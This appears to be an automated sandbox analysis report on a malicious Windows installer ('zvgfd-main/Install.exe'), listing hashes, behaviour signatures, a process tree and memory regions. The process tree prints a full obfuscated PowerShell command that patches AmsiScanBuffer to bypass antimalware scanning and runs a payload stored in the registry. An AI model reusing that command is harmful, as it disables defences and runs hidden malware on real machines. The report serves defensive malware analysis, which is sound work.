Analysis

  • max time kernel
    63s
  • max time network
    21s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 18:28

Errors

Reason
Machine shutdown

General

  • Target

    zvgfd-main/Install.exe

  • Size

    164KB

  • MD5

    319a41dd1934848abc8a5df381540481

  • SHA1

    24ad88753d62ae5e38c3b6caba45bef5c70f7699

  • SHA256

    abde8270375bf984b9a8bf1c15ff77f9e33ad185c7305471e05feb80843ee5bc

  • SHA512

    929ca873880db0706ab3d76d98acd343dafab2145fafa3aa05c273b3cf451aac16d1ce71776a9e1fde7a794f172d60dc1536876193bd510de8a259c3f43211cf

  • SSDEEP

    3072:xQpsM8ulc/LGjoOYDqFPgdt3oJ4xbnaldp9pq1N1dIfnXSxmPRnSee9:xQpsMjlc/LGMAFet30Kbml41N1dINP4p

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies data under HKEY_USERS 49 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:588
    • C:\Windows\system32\dwm.exe
      "dwm.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:384
    • C:\Windows\System32\dllhost.exe
      C:\Windows\System32\dllhost.exe /Processid:{b4a29e28-ef24-430e-b2b1-96dbe061b69e}
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1464
    • C:\Windows\system32\wlrmdr.exe
      -s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:5012
  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:676
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
    1⤵
      PID:960
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
      1⤵
        PID:744
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
        1⤵
          PID:652
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
          1⤵
            PID:1048
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
              2⤵
                PID:3160
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fcPxEybymrDc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LiPcPRKzMASPac,[Parameter(Position=1)][Type]$byMcZjwlFZ)$ooaFPUJPlWF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType('M'+[Char](121)+''+'D'+'e'+'l'+''+[Char](101)+'g'+[Char](97)+'t'+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+'C'+'l'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+'Pu'+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$ooaFPUJPlWF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$LiPcPRKzMASPac).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');$ooaFPUJPlWF.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+'k'+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+'i'+'r'+[Char](116)+'ual',$byMcZjwlFZ,$LiPcPRKzMASPac).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'ime'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $ooaFPUJPlWF.CreateType();}$SbVlXTTsEHJfE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'Un'+[Char](115)+''+[Char](97)+''+[Char](102)+'eN'+'a'+''+'t'+'i'+[Char](118)+'eM'+[Char](101)+'t'+[Char](104)+''+'o'+'d'+'s'+'');$vOllycWJtPjugG=$SbVlXTTsEHJfE.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+'A'+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags]('Pu'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AdgEUAMYwMNvRMkmMTx=fcPxEybymrDc @([String])([IntPtr]);$GcWchZLdclrHmukBGqHXRH=fcPxEybymrDc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MtAniNxtgFL=$SbVlXTTsEHJfE.GetMethod('G'+[Char](101)+''+'t'+'Mo'+'d'+''+[Char](117)+'le'+'H'+''+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'e'+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$xMCbWYMaiiWizZ=$vOllycWJtPjugG.Invoke($Null,@([Object]$MtAniNxtgFL,[Object]('L'+'o'+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+'r'+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$OmnsVWaiYHdBwIMHY=$vOllycWJtPjugG.Invoke($Null,@([Object]$MtAniNxtgFL,[Object](''+[Char](86)+'ir'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$vAIOiMs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xMCbWYMaiiWizZ,$AdgEUAMYwMNvRMkmMTx).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+'l');$YMFHLGHHCAyDFBvGB=$vOllycWJtPjugG.Invoke($Null,@([Object]$vAIOiMs,[Object]('Am'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$HSENqcwAhy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OmnsVWaiYHdBwIMHY,$GcWchZLdclrHmukBGqHXRH).Invoke($YMFHLGHHCAyDFBvGB,[uint32]8,4,[ref]$HSENqcwAhy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YMFHLGHHCAyDFBvGB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OmnsVWaiYHdBwIMHY,$GcWchZLdclrHmukBGqHXRH).Invoke($YMFHLGHHCAyDFBvGB,[uint32]8,0x20,[ref]$HSENqcwAhy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                2⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4920
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1092
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1104
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                  1⤵
                    PID:1120
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                    1⤵
                      PID:1260
                      • C:\Windows\system32\sihost.exe
                        sihost.exe
                        2⤵
                          PID:780
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1288
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1296
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1376
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1472
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1524
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1532
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                  1⤵
                                    PID:1640
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1672
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1700
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                        1⤵
                                          PID:1756
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1764
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                            1⤵
                                              PID:1876
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1932
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1940
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:2016
                                                  • C:\Windows\System32\spoolsv.exe
                                                    C:\Windows\System32\spoolsv.exe
                                                    1⤵
                                                      PID:1684
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2128
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2248
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2324
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                          1⤵
                                                            PID:2372
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2380
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                              1⤵
                                                              • Drops file in System32 directory
                                                              PID:2420
                                                            • C:\Windows\sysmon.exe
                                                              C:\Windows\sysmon.exe
                                                              1⤵
                                                                PID:2512
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                1⤵
                                                                  PID:2520
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                  1⤵
                                                                    PID:2536
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                    1⤵
                                                                      PID:2544
                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                      1⤵
                                                                        PID:2936
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2084
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:3212
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3412
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3480
                                                                              • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Install.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Install.exe"
                                                                                2⤵
                                                                                  PID:892
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3604
                                                                                • C:\Windows\system32\DllHost.exe
                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                  1⤵
                                                                                    PID:3796
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3960
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:3204
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                        1⤵
                                                                                        • Modifies data under HKEY_USERS
                                                                                        PID:2960
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                        1⤵
                                                                                          PID:4604
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:1132
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:956
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                              PID:640
                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                              1⤵
                                                                                                PID:3624
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                1⤵
                                                                                                  PID:1404
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:2064
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3804
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4292
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                        1⤵
                                                                                                          PID:2416

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_bjojyd40.y5g.ps1
                                                                                                          Filesize

                                                                                                          60B

                                                                                                          MD5

                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                          SHA1

                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                          SHA256

                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                          SHA512

                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                        • memory/384-77-0x0000019DCB160000-0x0000019DCB18C000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/384-85-0x0000019DCB160000-0x0000019DCB18C000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/588-33-0x00000286B63B0000-0x00000286B63D6000-memory.dmp
                                                                                                          Filesize

                                                                                                          152KB

                                                                                                        • memory/588-34-0x00000286B63E0000-0x00000286B640C000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/588-35-0x00000286B63E0000-0x00000286B640C000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/588-44-0x00007FF942AB0000-0x00007FF942AC0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/588-47-0x00007FF982ACD000-0x00007FF982ACE000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/588-43-0x00000286B63E0000-0x00000286B640C000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/676-49-0x000001EB278D0000-0x000001EB278FC000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/676-73-0x00007FF982ACF000-0x00007FF982AD0000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/676-57-0x000001EB278D0000-0x000001EB278FC000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/676-58-0x00007FF942AB0000-0x00007FF942AC0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/744-101-0x000001A351A60000-0x000001A351A86000-memory.dmp
                                                                                                          Filesize

                                                                                                          152KB

                                                                                                        • memory/744-712-0x000001A351A60000-0x000001A351A86000-memory.dmp
                                                                                                          Filesize

                                                                                                          152KB

                                                                                                        • memory/960-62-0x0000024997640000-0x000002499766C000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/960-70-0x0000024997640000-0x000002499766C000-memory.dmp
                                                                                                          Filesize

                                                                                                          176KB

                                                                                                        • memory/960-71-0x00007FF942AB0000-0x00007FF942AC0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/960-74-0x00007FF982ACC000-0x00007FF982ACD000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1464-22-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1464-20-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1464-19-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1464-27-0x00007FF982A30000-0x00007FF982C25000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/1464-28-0x00007FF981D80000-0x00007FF981E3E000-memory.dmp
                                                                                                          Filesize

                                                                                                          760KB

                                                                                                        • memory/1464-30-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1464-24-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1464-18-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4920-17-0x00007FF981D80000-0x00007FF981E3E000-memory.dmp
                                                                                                          Filesize

                                                                                                          760KB

                                                                                                        • memory/4920-29-0x00007FF964730000-0x00007FF9651F1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4920-0-0x00007FF964733000-0x00007FF964735000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4920-16-0x00007FF982A30000-0x00007FF982C25000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/4920-15-0x000002A26B8C0000-0x000002A26B8EA000-memory.dmp
                                                                                                          Filesize

                                                                                                          168KB

                                                                                                        • memory/4920-14-0x00007FF964730000-0x00007FF9651F1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4920-13-0x00007FF964730000-0x00007FF9651F1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4920-12-0x00007FF964730000-0x00007FF9651F1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4920-2-0x000002A26B750000-0x000002A26B772000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4920-1-0x00007FF964730000-0x00007FF9651F1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB